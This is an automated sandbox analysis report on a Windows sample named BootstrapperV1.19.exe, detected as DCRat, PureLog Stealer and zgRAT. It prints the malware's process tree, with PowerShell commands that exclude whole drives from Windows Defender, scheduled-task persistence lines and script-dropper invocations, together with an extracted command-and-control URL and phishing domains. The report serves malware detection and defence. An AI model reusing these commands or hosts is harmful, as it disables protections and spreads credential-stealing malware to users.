Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BootstrapperV1.19.exe

Overview

General Information

Sample name:BootstrapperV1.19.exe
Analysis ID:1511213
MD5:c9d720a4200df5064f655adc3656056f
SHA1:0dc179cfc3cf564ea1e9c85e012ac9bda3b40464
SHA256:9cd19cf01e1d8c64caa0dffcd07dfb3304fc7257a1c468c0f3d4df1ad696319f
Tags:exe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to a pastebin service (likely for C&C)
Creates processes via WMI
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • BootstrapperV1.19.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\BootstrapperV1.19.exe" MD5: C9D720A4200DF5064F655ADC3656056F)
    • BootstrapperV1.19.exe (PID: 7152 cmdline: "C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe" MD5: 90FD25CED85FE6DB28D21AE7D1F02E2C)
      • conhost.exe (PID: 6352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WerFault.exe (PID: 7048 cmdline: C:\Windows\system32\WerFault.exe -u -p 7152 -s 2180 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • Solaraexecutor.exe (PID: 6496 cmdline: "C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe" MD5: B444FEC863C995EC2C4810FC308F08C2)
      • wscript.exe (PID: 3260 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 4092 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5sOqbfN.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • PerfNET.exe (PID: 6520 cmdline: "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet/PerfNET.exe" MD5: 3C3B7D5864E9F151A77B33D4B9D15E3C)
            • schtasks.exe (PID: 5316 cmdline: schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRLx" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 5428 cmdline: schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRL" /sc ONLOGON /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 6108 cmdline: schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRL" /sc ONLOGON /tr "'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • powershell.exe (PID: 4296 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 3264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 2872 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • WmiPrvSE.exe (PID: 5672 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
            • powershell.exe (PID: 7084 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 4336 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 3732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 1216 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 2084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 3260 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 5316 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 5428 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 1368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 2696 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 6108 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 6372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 3720 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 6660 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 4280 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 4040 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7192 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ELAMBKUP\SIHClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7264 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7308 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\AppData\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7380 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 8036 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OQZC6ToBZn.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 8596 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • w32tm.exe (PID: 9112 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
        • conhost.exe (PID: 3696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • PerfNET.exe (PID: 7604 cmdline: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe MD5: 3C3B7D5864E9F151A77B33D4B9D15E3C)
  • PerfNET.exe (PID: 8284 cmdline: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe MD5: 3C3B7D5864E9F151A77B33D4B9D15E3C)
  • cleanup
{"C2 url": "http://598828cm.n9shka.top/VmPollSecureLongpollApiBasewindowsUniversal", "MUTEX": "DCR_MUTEX-BLa09nxFf1DKMOkShfe9", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
SourceRuleDescriptionAuthorStrings
BootstrapperV1.19.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    BootstrapperV1.19.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      \Device\ConDrvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
          C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Windows\ELAMBKUP\SIHClient.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              C:\Windows\ELAMBKUP\SIHClient.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 11 entries
                SourceRuleDescriptionAuthorStrings
                0000000D.00000000.1994292109.0000000000E02000.00000002.00000001.01000000.0000000E.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000003.00000003.1697999893.0000000004F02000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000003.00000003.1698866320.0000000005017000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000000.00000003.1695171822.0000000003269000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        00000000.00000000.1688952530.0000000000408000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          Click to see the 3 entries
                          SourceRuleDescriptionAuthorStrings
                          3.3.Solaraexecutor.exe.4f5070b.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            3.3.Solaraexecutor.exe.4f5070b.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  3.3.Solaraexecutor.exe.506570b.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                    Click to see the 20 entries

                                    System Summary

                                    barindex
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, ProcessId: 6520, TargetFilename: C:\Users\Default\AppData\RuntimeBroker.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet/PerfNET.exe", ParentImage: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, ParentProcessId: 6520, ParentProcessName: PerfNET.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 4296, ProcessName: powershell.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, ParentProcessId: 6496, ParentProcessName: Solaraexecutor.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , ProcessId: 3260, ProcessName: wscript.exe
                                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, ProcessId: 6520, TargetFilename: C:\Users\Default\AppData\RuntimeBroker.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, ParentProcessId: 6496, ParentProcessName: Solaraexecutor.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , ProcessId: 3260, ProcessName: wscript.exe
                                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, ParentProcessId: 6496, ParentProcessName: Solaraexecutor.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , ProcessId: 3260, ProcessName: wscript.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet/PerfNET.exe", ParentImage: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, ParentProcessId: 6520, ParentProcessName: PerfNET.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 4296, ProcessName: powershell.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRLx" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /f, CommandLine: schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRLx" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet/PerfNET.exe", ParentImage: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, ParentProcessId: 6520, ParentProcessName: PerfNET.exe, ProcessCommandLine: schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRLx" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /f, ProcessId: 5316, ProcessName: schtasks.exe
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, ParentProcessId: 6496, ParentProcessName: Solaraexecutor.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , ProcessId: 3260, ProcessName: wscript.exe
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet/PerfNET.exe", ParentImage: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, ParentProcessId: 6520, ParentProcessName: PerfNET.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 4296, ProcessName: powershell.exe
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-09-14T12:53:05.144390+020020480951A Network Trojan was detected192.168.2.46276180.211.144.15680TCP

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Source: BootstrapperV1.19.exeAvira: detected
                                    Source: https://getsolara.dev/Avira URL Cloud: Label: phishing
                                    Source: https://getsolara.dev/asset/discord.jsonAvira URL Cloud: Label: phishing
                                    Source: http://getsolara.devAvira URL Cloud: Label: phishing
                                    Source: https://getsolara.devAvira URL Cloud: Label: phishing
                                    Source: https://getsolara.dev/api/endpoint.jsonAvira URL Cloud: Label: phishing
                                    Source: https://getsolara.dev/SuspectedAvira URL Cloud: Label: phishing
                                    Source: https://getsolara.dev/XAvira URL Cloud: Label: phishing
                                    Source: http://598828cm.n9shka.top/VmPollSecureLongpollApiBasewindowsUniversal.phpAvira URL Cloud: Label: malware
                                    Source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeAvira: detection malicious, Label: TR/Redcap.oczed
                                    Source: C:\Users\Default\AppData\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\OQZC6ToBZn.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: 0000000D.00000002.2305646369.000000001348B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://598828cm.n9shka.top/VmPollSecureLongpollApiBasewindowsUniversal", "MUTEX": "DCR_MUTEX-BLa09nxFf1DKMOkShfe9", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Source: getsolara.devVirustotal: Detection: 13%Perma Link
                                    Source: https://getsolara.dev/Virustotal: Detection: 12%Perma Link
                                    Source: https://getsolara.dev/asset/discord.jsonVirustotal: Detection: 9%Perma Link
                                    Source: http://getsolara.devVirustotal: Detection: 13%Perma Link
                                    Source: https://getsolara.devVirustotal: Detection: 12%Perma Link
                                    Source: https://getsolara.dev/SuspectedVirustotal: Detection: 11%Perma Link
                                    Source: https://getsolara.dev/api/endpoint.jsonVirustotal: Detection: 9%Perma Link
                                    Source: https://getsolara.dev/XVirustotal: Detection: 11%Perma Link
                                    Source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exeReversingLabs: Detection: 57%
                                    Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exeReversingLabs: Detection: 57%
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeReversingLabs: Detection: 57%
                                    Source: C:\Users\Default\AppData\RuntimeBroker.exeReversingLabs: Detection: 57%
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeReversingLabs: Detection: 44%
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeReversingLabs: Detection: 55%
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeReversingLabs: Detection: 57%
                                    Source: BootstrapperV1.19.exeVirustotal: Detection: 87%Perma Link
                                    Source: BootstrapperV1.19.exeReversingLabs: Detection: 94%
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                    Source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exeJoe Sandbox ML: detected
                                    Source: C:\Users\Default\AppData\RuntimeBroker.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exeJoe Sandbox ML: detected
